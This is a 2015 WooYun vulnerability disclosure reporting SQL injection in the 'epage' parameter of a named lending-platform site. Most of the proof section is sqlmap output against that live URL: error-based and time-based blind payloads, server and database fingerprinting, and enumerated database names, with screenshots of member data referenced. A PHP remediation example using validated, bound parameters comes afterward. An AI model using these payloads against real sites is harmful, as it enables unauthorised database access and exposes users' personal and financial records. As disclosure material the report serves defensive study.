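Vulnerability summary

Bug ID: wooyun-2015-0156357

Title: Bundle of SQL injection vulnerabilities on a site of the 乐融巴巴 online lending platform

Vendor: lrbaba.com

Author: 路人甲

Submitted: 2015-11-27 18:41

Fixed: 2016-01-11 18:42

Disclosed: 2016-01-11 18:42

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Unable to contact the vendor, or the vendor actively ignored the report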

Source: http://www.wooyun.org

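Vulnerability details

Disclosure status:

2015-11-27: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-01-11: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As in the title.

Detailed description:

For a vulnerability this serious, is a spot on the front page too much to ask?

Proof of vulnerability:

Injection URL:

http://xj.lrbaba.com/index.php?comment&type=list&code=article&id=180&page=1&epage=3


The injectable parameter is epage.
Appending a single quote triggers an error:

[Screenshot: single-quote error]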

GET parameter 'epage' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2098 HTTP(s) requests:
---
Parameter: epage (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: comment&type=list&code=article&id=180&page=1&epage=3 PROCEDURE ANALYSE(EXTRACTVALUE(7294,CONCAT(0x5c,0x71787a7a71,(SELECT (CASE WHEN (7294=7294) THEN 1 ELSE 0 END)),0x717
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: comment&type=list&code=article&id=180&page=1&epage=3 PROCEDURE ANALYSE(EXTRACTVALUE(6825,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x66754441))))),1)
---
[15:28:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.1
[15:28:59] [INFO] fetching database names
[15:29:00] [INFO] the SQL query used returns 2 entries
[15:29:00] [INFO] retrieved: information_schema
[15:29:00] [INFO] retrieved: xjlrbaba
available databases [2]:
[*] information_schema
[*] xjlrbaba


Remediation:

Databases:

[Screenshot: the 2 databases]


Member information:

[Screenshot: member table]


[Screenshot: member record details]
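
One way to close this class of bug, as an added example that is not from the report or the site's code. It assumes epage is the page size that ends up in a LIMIT clause; the table and column names, the paging_int and list_comments helpers, and the in-memory SQLite database standing in for MySQL are all assumptions.

```php
<?php
// Added example, not the site's code. Table and column names are hypothetical.
// An in-memory SQLite database stands in for MySQL so the script runs offline.

// Accept only a plain decimal integer, clamped to [min, max]; otherwise use the default.
function paging_int($raw, int $default, int $min, int $max): int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return $default;
    }
    return max($min, min($max, (int)$raw));
}

function list_comments(PDO $db, array $query): array
{
    $id    = paging_int($query['id'] ?? null, 0, 0, PHP_INT_MAX);
    $page  = paging_int($query['page'] ?? null, 1, 1, 10000);
    $epage = paging_int($query['epage'] ?? null, 10, 1, 100); // rows per page

    $stmt = $db->prepare(
        'SELECT id, body FROM comment WHERE article_id = :id ORDER BY id LIMIT :lim OFFSET :off'
    );
    // Bind as integers so the values are never parsed as SQL text.
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':lim', $epage, PDO::PARAM_INT);
    $stmt->bindValue(':off', ($page - 1) * $epage, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comment (id INTEGER PRIMARY KEY, article_id INTEGER, body TEXT)');
for ($i = 1; $i <= 5; $i++) {
    $db->exec("INSERT INTO comment (article_id, body) VALUES (180, 'constructed comment $i')");
}

// Constructed inputs: a normal value, a trailing quote, and trailing SQL keywords.
$cases = ['3', "3'", '3 PROCEDURE ANALYSE(...)'];
foreach ($cases as $epage) {
    $rows = list_comments($db, ['id' => '180', 'page' => '1', 'epage' => $epage]);
    printf("epage=%-28s -> %d rows\n", var_export($epage, true), count($rows));
}
```

Non-numeric values fall back to the default page size instead of reaching the database, so the quote no longer produces a SQL error.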

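Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused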